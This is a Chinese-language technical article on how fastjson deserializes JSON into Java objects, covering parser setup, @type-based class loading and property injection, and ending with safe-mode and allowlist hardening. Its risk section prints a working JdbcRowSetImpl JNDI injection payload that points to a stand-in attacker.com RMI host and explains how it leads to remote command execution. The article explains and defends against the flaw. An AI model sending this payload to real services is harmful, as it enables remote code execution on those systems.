一、fastjson 反序列化核心概念
首先明确基础定义:
- 反序列化:将 JSON 字符串转换为 Java 对象的过程,fastjson 作为高性能 JSON 库,其反序列化核心是「基于字节码生成 + 反射」的混合实现。
- 原生反序列化:指 fastjson 默认的反序列化方式(非
ParserConfig.getGlobalInstance().setSafeMode(true)等安全模式),支持完整的类加载、属性注入和方法调用。
二、fastjson 原生反序列化核心流程
fastjson 反序列化的完整执行链路可分为 5 个核心步骤,我用流程图+文字拆解:
步骤1:JSON解析器初始化
fastjson 会创建DefaultJSONParser对象,核心参数包括:
- JSON 字符串的字符数组
- 配置类
ParserConfig(决定是否允许加载自定义类、是否开启安全模式等) - 特征配置
Feature(如是否允许单引号、是否忽略未知属性等)
核心代码示例:
// 手动初始化解析器(fastjson底层调用逻辑)Stringjson="{\"@type\":\"com.example.User\",\"name\":\"test\"}";ParserConfigconfig=ParserConfig.getGlobalInstance();// 默认全局配置DefaultJSONParserparser=newDefaultJSONParser(json,config,Feature.Default);步骤2:语法解析与Token提取
DefaultJSONParser通过Lexer对 JSON 字符串进行词法分析,将字符串拆分为 Token(如{、}、@type、字符串值、数字值等),核心逻辑:
- 识别 JSON 结构(对象/数组/基本类型);
- 提取关键标识:尤其是
@type字段(fastjson 反序列化的核心入口,指定要实例化的类名); - 校验 JSON 语法合法性(如括号匹配、引号闭合等)。
步骤3:类加载与实例化
这是反序列化的核心环节,fastjson 会根据@type指定的类名(或默认类)完成类加载和对象创建:
- 类加载:通过
ParserConfig的checkAutoType方法校验类名(原生模式下默认允许大部分类),然后通过Class.forName加载类; - 对象实例化:
- 优先调用类的无参构造方法(如果没有无参构造且未指定 Creator,会抛出异常);
- 支持通过
@JSONCreator注解指定有参构造/静态工厂方法; - 对于集合/数组等容器类,会创建对应的空容器对象。
核心代码(简化版):
// 类加载逻辑(ParserConfig核心方法)publicClass<?>checkAutoType(StringtypeName,Class<?>expectClass,intfeatures){// 原生模式下跳过大部分安全校验Class<?>clazz=Class.forName(typeName,true,Thread.currentThread().getContextClassLoader());returnclazz;}// 对象实例化(JavaBeanDeserializer)publicObjectcreateInstance(DefaultJSONParserparser,Typetype){// 优先找无参构造Constructor<?>constructor=clazz.getDeclaredConstructor();constructor.setAccessible(true);returnconstructor.newInstance();}步骤4:属性注入与方法调用
实例化对象后,fastjson 会遍历 JSON 中的键值对,完成属性赋值,核心逻辑:
- 属性匹配:将 JSON 的 key 与 Java 类的字段名/setter 方法匹配(支持驼峰/下划线自动转换);
- 类型转换:将 JSON 中的字符串/数字等值转换为 Java 字段的类型(如 String → Integer、JSON 对象 → 嵌套 Java 对象);
- 赋值方式:
- 优先调用
setXxx()方法(符合 JavaBean 规范); - 如果没有 setter,直接通过反射设置字段值(
field.setAccessible(true));
- 优先调用
- 特殊方法调用:
- 对于实现
java.io.Externalizable的类,会调用readExternal方法; - 对于自定义反序列化器(
ObjectDeserializer),会调用其deserialze方法。
- 对于实现
步骤5:返回最终对象
完成所有属性注入后,将实例化并赋值完成的 Java 对象返回,反序列化流程结束。
三、fastjson 反序列化关键组件
| 组件名 | 作用 |
|---|---|
DefaultJSONParser | 核心解析器,负责 JSON 词法/语法分析 |
ParserConfig | 反序列化配置中心,控制类加载、自动类型检测、反序列化器注册等 |
JavaBeanDeserializer | 默认的 JavaBean 反序列化器,处理普通类的实例化和属性注入 |
Lexer | 词法分析器,将 JSON 字符串拆分为 Token |
ObjectDeserializer | 反序列化器接口,自定义类可实现该接口定制反序列化逻辑 |
四、原生反序列化的核心风险(深度剖析重点)
fastjson 原生反序列化的最大问题在于@type字段的滥用,核心风险点:
- 任意类加载:原生模式下
checkAutoType校验宽松,攻击者可通过@type指定危险类(如com.sun.rowset.JdbcRowSetImpl); - 反射执行恶意代码:危险类实例化后,其属性注入过程会触发敏感方法(如
JdbcRowSetImpl的setDataSourceName会触发 JNDI 调用,进而加载远程恶意类); - 无参构造触发风险:部分危险类的无参构造方法本身就会执行敏感逻辑(如文件写入、命令执行)。
典型恶意 JSON 示例:
{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://attacker.com/malicious.class","autoCommit":true}执行流程:
- 加载
JdbcRowSetImpl类 → 实例化(无参构造); - 注入
dataSourceName属性(调用setDataSourceName); - 注入
autoCommit属性(调用setAutoCommit,内部触发connect方法,访问 RMI 服务器加载恶意类); - 恶意类执行命令,完成攻击。
五、fastjson 反序列化优化/安全配置
为了规避风险,实际使用中需调整配置:
- 开启安全模式:
ParserConfig.getGlobalInstance().setSafeMode(true); - 白名单控制:
ParserConfigconfig=newParserConfig();config.addAccept("com.example.");// 只允许反序列化指定包下的类 - 禁用
@type字段:DefaultJSONParserparser=newDefaultJSONParser(json,config,Feature.DisableSpecialKeyDetect);
总结
- fastjson 原生反序列化核心是「解析 JSON → 加载类 → 实例化对象 → 反射注入属性」,依赖
ParserConfig控制类加载规则; @type字段是反序列化的核心入口,也是安全风险的主要来源,原生模式下校验宽松易导致任意代码执行;- 生产环境必须开启安全模式/白名单,禁用不必要的
@type解析,避免反序列化漏洞。
)
